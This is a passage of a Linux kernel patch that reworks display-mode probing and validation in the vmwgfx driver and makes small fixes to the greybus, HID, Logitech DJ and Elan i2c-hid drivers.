+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x768@60Hz */
+-	{ DRM_MODE("1280x768", DRM_MODE_TYPE_DRIVER, 79500, 1280, 1344,
+-		   1472, 1664, 0, 768, 771, 778, 798, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x800@60Hz */
+-	{ DRM_MODE("1280x800", DRM_MODE_TYPE_DRIVER, 83500, 1280, 1352,
+-		   1480, 1680, 0, 800, 803, 809, 831, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 1280x960@60Hz */
+-	{ DRM_MODE("1280x960", DRM_MODE_TYPE_DRIVER, 108000, 1280, 1376,
+-		   1488, 1800, 0, 960, 961, 964, 1000, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x1024@60Hz */
+-	{ DRM_MODE("1280x1024", DRM_MODE_TYPE_DRIVER, 108000, 1280, 1328,
+-		   1440, 1688, 0, 1024, 1025, 1028, 1066, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1360x768@60Hz */
+-	{ DRM_MODE("1360x768", DRM_MODE_TYPE_DRIVER, 85500, 1360, 1424,
+-		   1536, 1792, 0, 768, 771, 777, 795, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1440x1050@60Hz */
+-	{ DRM_MODE("1400x1050", DRM_MODE_TYPE_DRIVER, 121750, 1400, 1488,
+-		   1632, 1864, 0, 1050, 1053, 1057, 1089, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1440x900@60Hz */
+-	{ DRM_MODE("1440x900", DRM_MODE_TYPE_DRIVER, 106500, 1440, 1520,
+-		   1672, 1904, 0, 900, 903, 909, 934, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1600x1200@60Hz */
+-	{ DRM_MODE("1600x1200", DRM_MODE_TYPE_DRIVER, 162000, 1600, 1664,
+-		   1856, 2160, 0, 1200, 1201, 1204, 1250, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1680x1050@60Hz */
+-	{ DRM_MODE("1680x1050", DRM_MODE_TYPE_DRIVER, 146250, 1680, 1784,
+-		   1960, 2240, 0, 1050, 1053, 1059, 1089, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1792x1344@60Hz */
+-	{ DRM_MODE("1792x1344", DRM_MODE_TYPE_DRIVER, 204750, 1792, 1920,
+-		   2120, 2448, 0, 1344, 1345, 1348, 1394, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1853x1392@60Hz */
+-	{ DRM_MODE("1856x1392", DRM_MODE_TYPE_DRIVER, 218250, 1856, 1952,
+-		   2176, 2528, 0, 1392, 1393, 1396, 1439, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1920x1080@60Hz */
+-	{ DRM_MODE("1920x1080", DRM_MODE_TYPE_DRIVER, 173000, 1920, 2048,
+-		   2248, 2576, 0, 1080, 1083, 1088, 1120, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1920x1200@60Hz */
+-	{ DRM_MODE("1920x1200", DRM_MODE_TYPE_DRIVER, 193250, 1920, 2056,
+-		   2256, 2592, 0, 1200, 1203, 1209, 1245, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1920x1440@60Hz */
+-	{ DRM_MODE("1920x1440", DRM_MODE_TYPE_DRIVER, 234000, 1920, 2048,
+-		   2256, 2600, 0, 1440, 1441, 1444, 1500, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 2560x1440@60Hz */
+-	{ DRM_MODE("2560x1440", DRM_MODE_TYPE_DRIVER, 241500, 2560, 2608,
+-		   2640, 2720, 0, 1440, 1443, 1448, 1481, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 2560x1600@60Hz */
+-	{ DRM_MODE("2560x1600", DRM_MODE_TYPE_DRIVER, 348500, 2560, 2752,
+-		   3032, 3504, 0, 1600, 1603, 1609, 1658, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 2880x1800@60Hz */
+-	{ DRM_MODE("2880x1800", DRM_MODE_TYPE_DRIVER, 337500, 2880, 2928,
+-		   2960, 3040, 0, 1800, 1803, 1809, 1852, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 3840x2160@60Hz */
+-	{ DRM_MODE("3840x2160", DRM_MODE_TYPE_DRIVER, 533000, 3840, 3888,
+-		   3920, 4000, 0, 2160, 2163, 2168, 2222, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 3840x2400@60Hz */
+-	{ DRM_MODE("3840x2400", DRM_MODE_TYPE_DRIVER, 592250, 3840, 3888,
+-		   3920, 4000, 0, 2400, 2403, 2409, 2469, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* Terminate */
+-	{ DRM_MODE("", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) },
+-};
+-
+ /**
+  * vmw_guess_mode_timing - Provide fake timings for a
+  * 60Hz vrefresh mode.
+@@ -2333,88 +2234,6 @@ void vmw_guess_mode_timing(struct drm_display_mode *mode)
+ }
+ 
+ 
+-int vmw_du_connector_fill_modes(struct drm_connector *connector,
+-				uint32_t max_width, uint32_t max_height)
+-{
+-	struct vmw_display_unit *du = vmw_connector_to_du(connector);
+-	struct drm_device *dev = connector->dev;
+-	struct vmw_private *dev_priv = vmw_priv(dev);
+-	struct drm_display_mode *mode = NULL;
+-	struct drm_display_mode *bmode;
+-	struct drm_display_mode prefmode = { DRM_MODE("preferred",
+-		DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED,
+-		0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-		DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC)
+-	};
+-	int i;
+-	u32 assumed_bpp = 4;
+-
+-	if (dev_priv->assume_16bpp)
+-		assumed_bpp = 2;
+-
+-	max_width  = min(max_width,  dev_priv->texture_max_width);
+-	max_height = min(max_height, dev_priv->texture_max_height);
+-
+-	/*
+-	 * For STDU extra limit for a mode on SVGA_REG_SCREENTARGET_MAX_WIDTH/
+-	 * HEIGHT registers.
+-	 */
+-	if (dev_priv->active_display_unit == vmw_du_screen_target) {
+-		max_width  = min(max_width,  dev_priv->stdu_max_width);
+-		max_height = min(max_height, dev_priv->stdu_max_height);
+-	}
+-
+-	/* Add preferred mode */
+-	mode = drm_mode_duplicate(dev, &prefmode);
+-	if (!mode)
+-		return 0;
+-	mode->hdisplay = du->pref_width;
+-	mode->vdisplay = du->pref_height;
+-	vmw_guess_mode_timing(mode);
+-	drm_mode_set_name(mode);
+-
+-	if (vmw_kms_validate_mode_vram(dev_priv,
+-					mode->hdisplay * assumed_bpp,
+-					mode->vdisplay)) {
+-		drm_mode_probed_add(connector, mode);
+-	} else {
+-		drm_mode_destroy(dev, mode);
+-		mode = NULL;
+-	}
+-
+-	if (du->pref_mode) {
+-		list_del_init(&du->pref_mode->head);
+-		drm_mode_destroy(dev, du->pref_mode);
+-	}
+-
+-	/* mode might be null here, this is intended */
+-	du->pref_mode = mode;
+-
+-	for (i = 0; vmw_kms_connector_builtin[i].type != 0; i++) {
+-		bmode = &vmw_kms_connector_builtin[i];
+-		if (bmode->hdisplay > max_width ||
+-		    bmode->vdisplay > max_height)
+-			continue;
+-
+-		if (!vmw_kms_validate_mode_vram(dev_priv,
+-						bmode->hdisplay * assumed_bpp,
+-						bmode->vdisplay))
+-			continue;
+-
+-		mode = drm_mode_duplicate(dev, bmode);
+-		if (!mode)
+-			return 0;
+-
+-		drm_mode_probed_add(connector, mode);
+-	}
+-
+-	drm_connector_list_update(connector);
+-	/* Move the prefered mode first, help apps pick the right mode. */
+-	drm_mode_sort(&connector->modes);
+-
+-	return 1;
+-}
+-
+ /**
+  * vmw_kms_update_layout_ioctl - Handler for DRM_VMW_UPDATE_LAYOUT ioctl
+  * @dev: drm device for the ioctl
+@@ -2448,10 +2267,9 @@ int vmw_kms_update_layout_ioctl(struct drm_device *dev, void *data,
+ 	int ret, i;
+ 
+ 	if (!arg->num_outputs) {
+-		struct drm_rect def_rect = {0, 0, 800, 600};
+-		VMW_DEBUG_KMS("Default layout x1 = %d y1 = %d x2 = %d y2 = %d\n",
+-			      def_rect.x1, def_rect.y1,
+-			      def_rect.x2, def_rect.y2);
++		struct drm_rect def_rect = {0, 0,
++					    VMWGFX_MIN_INITIAL_WIDTH,
++					    VMWGFX_MIN_INITIAL_HEIGHT};
+ 		vmw_du_update_layout(dev_priv, 1, &def_rect);
+ 		return 0;
+ 	}
+@@ -2746,68 +2564,6 @@ int vmw_kms_update_proxy(struct vmw_resource *res,
+ 	return 0;
+ }
+ 
+-int vmw_kms_fbdev_init_data(struct vmw_private *dev_priv,
+-			    unsigned unit,
+-			    u32 max_width,
+-			    u32 max_height,
+-			    struct drm_connector **p_con,
+-			    struct drm_crtc **p_crtc,
+-			    struct drm_display_mode **p_mode)
+-{
+-	struct drm_connector *con;
+-	struct vmw_display_unit *du;
+-	struct drm_display_mode *mode;
+-	int i = 0;
+-	int ret = 0;
+-
+-	mutex_lock(&dev_priv->drm.mode_config.mutex);
+-	list_for_each_entry(con, &dev_priv->drm.mode_config.connector_list,
+-			    head) {
+-		if (i == unit)
+-			break;
+-
+-		++i;
+-	}
+-
+-	if (&con->head == &dev_priv->drm.mode_config.connector_list) {
+-		DRM_ERROR("Could not find initial display unit.\n");
+-		ret = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	if (list_empty(&con->modes))
+-		(void) vmw_du_connector_fill_modes(con, max_width, max_height);
+-
+-	if (list_empty(&con->modes)) {
+-		DRM_ERROR("Could not find initial display mode.\n");
+-		ret = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	du = vmw_connector_to_du(con);
+-	*p_con = con;
+-	*p_crtc = &du->crtc;
+-
+-	list_for_each_entry(mode, &con->modes, head) {
+-		if (mode->type & DRM_MODE_TYPE_PREFERRED)
+-			break;
+-	}
+-
+-	if (&mode->head == &con->modes) {
+-		WARN_ONCE(true, "Could not find initial preferred mode.\n");
+-		*p_mode = list_first_entry(&con->modes,
+-					   struct drm_display_mode,
+-					   head);
+-	} else {
+-		*p_mode = mode;
+-	}
+-
+- out_unlock:
+-	mutex_unlock(&dev_priv->drm.mode_config.mutex);
+-
+-	return ret;
+-}
+-
+ /**
+  * vmw_kms_create_implicit_placement_property - Set up the implicit placement
+  * property.
+@@ -3006,3 +2762,84 @@ int vmw_du_helper_plane_update(struct vmw_du_update_plane *update)
+ 	vmw_validation_unref_lists(&val_ctx);
+ 	return ret;
+ }
++
++/**
++ * vmw_connector_mode_valid - implements drm_connector_helper_funcs.mode_valid callback
++ *
++ * @connector: the drm connector, part of a DU container
++ * @mode: drm mode to check
++ *
++ * Returns MODE_OK on success, or a drm_mode_status error code.
++ */
++enum drm_mode_status vmw_connector_mode_valid(struct drm_connector *connector,
++					      struct drm_display_mode *mode)
++{
++	enum drm_mode_status ret;
++	struct drm_device *dev = connector->dev;
++	struct vmw_private *dev_priv = vmw_priv(dev);
++	u32 assumed_cpp = 4;
++
++	if (dev_priv->assume_16bpp)
++		assumed_cpp = 2;
++
++	ret = drm_mode_validate_size(mode, dev_priv->texture_max_width,
++				     dev_priv->texture_max_height);
++	if (ret != MODE_OK)
++		return ret;
++
++	if (!vmw_kms_validate_mode_vram(dev_priv,
++					mode->hdisplay * assumed_cpp,
++					mode->vdisplay))
++		return MODE_MEM;
++
++	return MODE_OK;
++}
++
++/**
++ * vmw_connector_get_modes - implements drm_connector_helper_funcs.get_modes callback
++ *
++ * @connector: the drm connector, part of a DU container
++ *
++ * Returns the number of added modes.
++ */
++int vmw_connector_get_modes(struct drm_connector *connector)
++{
++	struct vmw_display_unit *du = vmw_connector_to_du(connector);
++	struct drm_device *dev = connector->dev;
++	struct vmw_private *dev_priv = vmw_priv(dev);
++	struct drm_display_mode *mode = NULL;
++	struct drm_display_mode prefmode = { DRM_MODE("preferred",
++		DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED,
++		0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++		DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC)
++	};
++	u32 max_width;
++	u32 max_height;
++	u32 num_modes;
++
++	/* Add preferred mode */
++	mode = drm_mode_duplicate(dev, &prefmode);
++	if (!mode)
++		return 0;
++
++	mode->hdisplay = du->pref_width;
++	mode->vdisplay = du->pref_height;
++	vmw_guess_mode_timing(mode);
++	drm_mode_set_name(mode);
++
++	drm_mode_probed_add(connector, mode);
++	drm_dbg_kms(dev, "preferred mode " DRM_MODE_FMT "\n", DRM_MODE_ARG(mode));
++
++	/* Probe connector for all modes not exceeding our geom limits */
++	max_width  = dev_priv->texture_max_width;
++	max_height = dev_priv->texture_max_height;
++
++	if (dev_priv->active_display_unit == vmw_du_screen_target) {
++		max_width  = min(dev_priv->stdu_max_width,  max_width);
++		max_height = min(dev_priv->stdu_max_height, max_height);
++	}
++
++	num_modes = 1 + drm_add_modes_noedid(connector, max_width, max_height);
++
++	return num_modes;
++}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index b116600b343a8..1099de1ece4b3 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -379,7 +379,6 @@ struct vmw_display_unit {
+ 	unsigned pref_width;
+ 	unsigned pref_height;
+ 	bool pref_active;
+-	struct drm_display_mode *pref_mode;
+ 
+ 	/*
+ 	 * Gui positioning
+@@ -429,8 +428,6 @@ void vmw_du_connector_save(struct drm_connector *connector);
+ void vmw_du_connector_restore(struct drm_connector *connector);
+ enum drm_connector_status
+ vmw_du_connector_detect(struct drm_connector *connector, bool force);
+-int vmw_du_connector_fill_modes(struct drm_connector *connector,
+-				uint32_t max_width, uint32_t max_height);
+ int vmw_kms_helper_dirty(struct vmw_private *dev_priv,
+ 			 struct vmw_framebuffer *framebuffer,
+ 			 const struct drm_clip_rect *clips,
+@@ -439,6 +436,9 @@ int vmw_kms_helper_dirty(struct vmw_private *dev_priv,
+ 			 int num_clips,
+ 			 int increment,
+ 			 struct vmw_kms_dirty *dirty);
++enum drm_mode_status vmw_connector_mode_valid(struct drm_connector *connector,
++					      struct drm_display_mode *mode);
++int vmw_connector_get_modes(struct drm_connector *connector);
+ 
+ void vmw_kms_helper_validation_finish(struct vmw_private *dev_priv,
+ 				      struct drm_file *file_priv,
+@@ -458,13 +458,6 @@ vmw_kms_new_framebuffer(struct vmw_private *dev_priv,
+ 			struct vmw_surface *surface,
+ 			bool only_2d,
+ 			const struct drm_mode_fb_cmd2 *mode_cmd);
+-int vmw_kms_fbdev_init_data(struct vmw_private *dev_priv,
+-			    unsigned unit,
+-			    u32 max_width,
+-			    u32 max_height,
+-			    struct drm_connector **p_con,
+-			    struct drm_crtc **p_crtc,
+-			    struct drm_display_mode **p_mode);
+ void vmw_guess_mode_timing(struct drm_display_mode *mode);
+ void vmw_kms_update_implicit_fb(struct vmw_private *dev_priv);
+ void vmw_kms_create_implicit_placement_property(struct vmw_private *dev_priv);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+index ac72c20715f32..fdaf7d28cb211 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+@@ -263,7 +263,7 @@ static void vmw_ldu_connector_destroy(struct drm_connector *connector)
+ static const struct drm_connector_funcs vmw_legacy_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+-	.fill_modes = vmw_du_connector_fill_modes,
++	.fill_modes = drm_helper_probe_single_connector_modes,
+ 	.destroy = vmw_ldu_connector_destroy,
+ 	.reset = vmw_du_connector_reset,
+ 	.atomic_duplicate_state = vmw_du_connector_duplicate_state,
+@@ -272,6 +272,8 @@ static const struct drm_connector_funcs vmw_legacy_connector_funcs = {
+ 
+ static const struct
+ drm_connector_helper_funcs vmw_ldu_connector_helper_funcs = {
++	.get_modes = vmw_connector_get_modes,
++	.mode_valid = vmw_connector_mode_valid
+ };
+ 
+ static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+@@ -408,7 +410,6 @@ static int vmw_ldu_init(struct vmw_private *dev_priv, unsigned unit)
+ 	ldu->base.pref_active = (unit == 0);
+ 	ldu->base.pref_width = dev_priv->initial_width;
+ 	ldu->base.pref_height = dev_priv->initial_height;
+-	ldu->base.pref_mode = NULL;
+ 
+ 	/*
+ 	 * Remove this after enabling atomic because property values can
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+index e1f36a09c59c1..e33684f56eda8 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+@@ -346,7 +346,7 @@ static void vmw_sou_connector_destroy(struct drm_connector *connector)
+ static const struct drm_connector_funcs vmw_sou_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+-	.fill_modes = vmw_du_connector_fill_modes,
++	.fill_modes = drm_helper_probe_single_connector_modes,
+ 	.destroy = vmw_sou_connector_destroy,
+ 	.reset = vmw_du_connector_reset,
+ 	.atomic_duplicate_state = vmw_du_connector_duplicate_state,
+@@ -356,6 +356,8 @@ static const struct drm_connector_funcs vmw_sou_connector_funcs = {
+ 
+ static const struct
+ drm_connector_helper_funcs vmw_sou_connector_helper_funcs = {
++	.get_modes = vmw_connector_get_modes,
++	.mode_valid = vmw_connector_mode_valid
+ };
+ 
+ 
+@@ -827,7 +829,6 @@ static int vmw_sou_init(struct vmw_private *dev_priv, unsigned unit)
+ 	sou->base.pref_active = (unit == 0);
+ 	sou->base.pref_width = dev_priv->initial_width;
+ 	sou->base.pref_height = dev_priv->initial_height;
+-	sou->base.pref_mode = NULL;
+ 
+ 	/*
+ 	 * Remove this after enabling atomic because property values can
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+index 0090abe892548..6dd33d1258d11 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+@@ -40,7 +40,14 @@
+ #define vmw_connector_to_stdu(x) \
+ 	container_of(x, struct vmw_screen_target_display_unit, base.connector)
+ 
+-
++/*
++ * Some renderers such as llvmpipe will align the width and height of their
++ * buffers to match their tile size. We need to keep this in mind when exposing
++ * modes to userspace so that this possible over-allocation will not exceed
++ * graphics memory. 64x64 pixels seems to be a reasonable upper bound for the
++ * tile size of current renderers.
++ */
++#define GPU_TILE_SIZE 64
+ 
+ enum stdu_content_type {
+ 	SAME_AS_DISPLAY = 0,
+@@ -972,12 +979,46 @@ static void vmw_stdu_connector_destroy(struct drm_connector *connector)
+ 	vmw_stdu_destroy(vmw_connector_to_stdu(connector));
+ }
+ 
++static enum drm_mode_status
++vmw_stdu_connector_mode_valid(struct drm_connector *connector,
++			      struct drm_display_mode *mode)
++{
++	enum drm_mode_status ret;
++	struct drm_device *dev = connector->dev;
++	struct vmw_private *dev_priv = vmw_priv(dev);
++	u64 assumed_cpp = dev_priv->assume_16bpp ? 2 : 4;
++	/* Align width and height to account for GPU tile over-alignment */
++	u64 required_mem = ALIGN(mode->hdisplay, GPU_TILE_SIZE) *
++			   ALIGN(mode->vdisplay, GPU_TILE_SIZE) *
++			   assumed_cpp;
++	required_mem = ALIGN(required_mem, PAGE_SIZE);
++
++	ret = drm_mode_validate_size(mode, dev_priv->stdu_max_width,
++				     dev_priv->stdu_max_height);
++	if (ret != MODE_OK)
++		return ret;
+ 
++	ret = drm_mode_validate_size(mode, dev_priv->texture_max_width,
++				     dev_priv->texture_max_height);
++	if (ret != MODE_OK)
++		return ret;
++
++	if (required_mem > dev_priv->max_primary_mem)
++		return MODE_MEM;
++
++	if (required_mem > dev_priv->max_mob_pages * PAGE_SIZE)
++		return MODE_MEM;
++
++	if (required_mem > dev_priv->max_mob_size)
++		return MODE_MEM;
++
++	return MODE_OK;
++}
+ 
+ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+-	.fill_modes = vmw_du_connector_fill_modes,
++	.fill_modes = drm_helper_probe_single_connector_modes,
+ 	.destroy = vmw_stdu_connector_destroy,
+ 	.reset = vmw_du_connector_reset,
+ 	.atomic_duplicate_state = vmw_du_connector_duplicate_state,
+@@ -987,6 +1028,8 @@ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ 
+ static const struct
+ drm_connector_helper_funcs vmw_stdu_connector_helper_funcs = {
++	.get_modes = vmw_connector_get_modes,
++	.mode_valid = vmw_stdu_connector_mode_valid
+ };
+ 
+ 
+diff --git a/drivers/greybus/interface.c b/drivers/greybus/interface.c
+index 9ec949a438ef6..52ef6be9d4499 100644
+--- a/drivers/greybus/interface.c
++++ b/drivers/greybus/interface.c
+@@ -694,6 +694,7 @@ static void gb_interface_release(struct device *dev)
+ 
+ 	trace_gb_interface_release(intf);
+ 
++	cancel_work_sync(&intf->mode_switch_work);
+ 	kfree(intf);
+ }
+ 
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index cdad3a0662876..e2e52aa0eeba9 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -1451,7 +1451,6 @@ static void implement(const struct hid_device *hid, u8 *report,
+ 			hid_warn(hid,
+ 				 "%s() called with too large value %d (n: %d)! (%s)\n",
+ 				 __func__, value, n, current->comm);
+-			WARN_ON(1);
+ 			value &= m;
+ 		}
+ 	}
+diff --git a/drivers/hid/hid-logitech-dj.c b/drivers/hid/hid-logitech-dj.c
+index 57697605b2e24..dc7b0fe83478e 100644
+--- a/drivers/hid/hid-logitech-dj.c
++++ b/drivers/hid/hid-logitech-dj.c
+@@ -1284,8 +1284,10 @@ static int logi_dj_recv_switch_to_dj_mode(struct dj_receiver_dev *djrcv_dev,
+ 		 */
+ 		msleep(50);
+ 
+-		if (retval)
++		if (retval) {
++			kfree(dj_report);
+ 			return retval;
++		}
+ 	}
+ 
+ 	/*
+diff --git a/drivers/hid/i2c-hid/i2c-hid-of-elan.c b/drivers/hid/i2c-hid/i2c-hid-of-elan.c
+index 2d991325e734c..8d4deb2def97b 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-of-elan.c
++++ b/drivers/hid/i2c-hid/i2c-hid-of-elan.c
+@@ -18,9 +18,11 @@
+ #include "i2c-hid.h"
+ 
+ struct elan_i2c_hid_chip_data {
+-	unsigned int post_gpio_reset_delay_ms;
++	unsigned int post_gpio_reset_on_delay_ms;
++	unsigned int post_gpio_reset_off_delay_ms;
+ 	unsigned int post_power_delay_ms;
+ 	u16 hid_descriptor_address;
++	const char *main_supply_name;
+ };
+ 
+ struct i2c_hid_of_elan {
+@@ -29,6 +31,7 @@ struct i2c_hid_of_elan {
+ 	struct regulator *vcc33;
+ 	struct regulator *vccio;
+ 	struct gpio_desc *reset_gpio;
++	bool no_reset_on_power_off;
+ 	const struct elan_i2c_hid_chip_data *chip_data;
+ };
+ 
+@@ -38,24 +41,35 @@ static int elan_i2c_hid_power_up(struct i2chid_ops *ops)
+ 		container_of(ops, struct i2c_hid_of_elan, ops);
+ 	int ret;
+ 
+-	ret = regulator_enable(ihid_elan->vcc33);
+-	if (ret)
+-		return ret;
++	gpiod_set_value_cansleep(ihid_elan->reset_gpio, 1);
+ 
+-	ret = regulator_enable(ihid_elan->vccio);
+-	if (ret) {
+-		regulator_disable(ihid_elan->vcc33);
+-		return ret;
++	if (ihid_elan->vcc33) {
++		ret = regulator_enable(ihid_elan->vcc33);
++		if (ret)
++			goto err_deassert_reset;
+ 	}
+ 
++	ret = regulator_enable(ihid_elan->vccio);
++	if (ret)
++		goto err_disable_vcc33;
++
+ 	if (ihid_elan->chip_data->post_power_delay_ms)
+ 		msleep(ihid_elan->chip_data->post_power_delay_ms);
+ 
+ 	gpiod_set_value_cansleep(ihid_elan->reset_gpio, 0);
+-	if (ihid_elan->chip_data->post_gpio_reset_delay_ms)
+-		msleep(ihid_elan->chip_data->post_gpio_reset_delay_ms);
++	if (ihid_elan->chip_data->post_gpio_reset_on_delay_ms)
++		msleep(ihid_elan->chip_data->post_gpio_reset_on_delay_ms);
+ 
+ 	return 0;
++
++err_disable_vcc33:
++	if (ihid_elan->vcc33)
++		regulator_disable(ihid_elan->vcc33);
++err_deassert_reset:
++	if (ihid_elan->no_reset_on_power_off)
++		gpiod_set_value_cansleep(ihid_elan->reset_gpio, 0);
++
++	return ret;
+ }
+ 
+ static void elan_i2c_hid_power_down(struct i2chid_ops *ops)
+@@ -63,15 +77,27 @@ static void elan_i2c_hid_power_down(struct i2chid_ops *ops)
+ 	struct i2c_hid_of_elan *ihid_elan =
+ 		container_of(ops, struct i2c_hid_of_elan, ops);
+ 
+-	gpiod_set_value_cansleep(ihid_elan->reset_gpio, 1);
++	/*
++	 * Do not assert reset when the hardware allows for it to remain
++	 * deasserted regardless of the state of the (shared) power supply to
++	 * avoid wasting power when the supply is left on.
++	 */
++	if (!ihid_elan->no_reset_on_power_off)
++		gpiod_set_value_cansleep(ihid_elan->reset_gpio, 1);
++
++	if (ihid_elan->chip_data->post_gpio_reset_off_delay_ms)
++		msleep(ihid_elan->chip_data->post_gpio_reset_off_delay_ms);
++
+ 	regulator_disable(ihid_elan->vccio);
+-	regulator_disable(ihid_elan->vcc33);
++	if (ihid_elan->vcc33)
++		regulator_disable(ihid_elan->vcc33);
+ }
+ 
+ static int i2c_hid_of_elan_probe(struct i2c_client *client,
+ 				 const struct i2c_device_id *id)
+ {
+ 	struct i2c_hid_of_elan *ihid_elan;
++	int ret;
+ 
+ 	ihid_elan = devm_kzalloc(&client->dev, sizeof(*ihid_elan), GFP_KERNEL);
+ 	if (!ihid_elan)
+@@ -86,28 +112,63 @@ static int i2c_hid_of_elan_probe(struct i2c_client *client,
+ 	if (IS_ERR(ihid_elan->reset_gpio))
+ 		return PTR_ERR(ihid_elan->reset_gpio);
+ 
+-	ihid_elan->vccio = devm_regulator_get(&client->dev, "vccio");
+-	if (IS_ERR(ihid_elan->vccio))
+-		return PTR_ERR(ihid_elan->vccio);
++	ihid_elan->no_reset_on_power_off = of_property_read_bool(client->dev.of_node,
++						"no-reset-on-power-off");
+ 
+-	ihid_elan->vcc33 = devm_regulator_get(&client->dev, "vcc33");
+-	if (IS_ERR(ihid_elan->vcc33))
+-		return PTR_ERR(ihid_elan->vcc33);
++	ihid_elan->vccio = devm_regulator_get(&client->dev, "vccio");
++	if (IS_ERR(ihid_elan->vccio)) {
++		ret = PTR_ERR(ihid_elan->vccio);
++		goto err_deassert_reset;
++	}
+ 
+ 	ihid_elan->chip_data = device_get_match_data(&client->dev);
+ 
+-	return i2c_hid_core_probe(client, &ihid_elan->ops,
+-				  ihid_elan->chip_data->hid_descriptor_address, 0);
++	if (ihid_elan->chip_data->main_supply_name) {
++		ihid_elan->vcc33 = devm_regulator_get(&client->dev,
++						      ihid_elan->chip_data->main_supply_name);
++		if (IS_ERR(ihid_elan->vcc33)) {
++			ret = PTR_ERR(ihid_elan->vcc33);
++			goto err_deassert_reset;
++		}
++	}
++
++	ret = i2c_hid_core_probe(client, &ihid_elan->ops,
++				 ihid_elan->chip_data->hid_descriptor_address, 0);
++	if (ret)
++		goto err_deassert_reset;
++
++	return 0;
++
++err_deassert_reset:
++	if (ihid_elan->no_reset_on_power_off)
++		gpiod_set_value_cansleep(ihid_elan->reset_gpio, 0);
++
++	return ret;
+ }
+ 
+ static const struct elan_i2c_hid_chip_data elan_ekth6915_chip_data = {
+ 	.post_power_delay_ms = 1,
+-	.post_gpio_reset_delay_ms = 300,
++	.post_gpio_reset_on_delay_ms = 300,
++	.hid_descriptor_address = 0x0001,
++	.main_supply_name = "vcc33",
++};
++
++static const struct elan_i2c_hid_chip_data ilitek_ili9882t_chip_data = {
++	.post_power_delay_ms = 1,
++	.post_gpio_reset_on_delay_ms = 200,
++	.post_gpio_reset_off_delay_ms = 65,
+ 	.hid_descriptor_address = 0x0001,
++	/*
++	 * This touchscreen is tightly integrated with the panel and assumes
++	 * that the relevant power rails (other than the IO rail) have already
++	 * been turned on by the panel driver because we're a panel follower.
++	 */
++	.main_supply_name = NULL,
+ };
+ 
+ static const struct of_device_id elan_i2c_hid_of_match[] = {
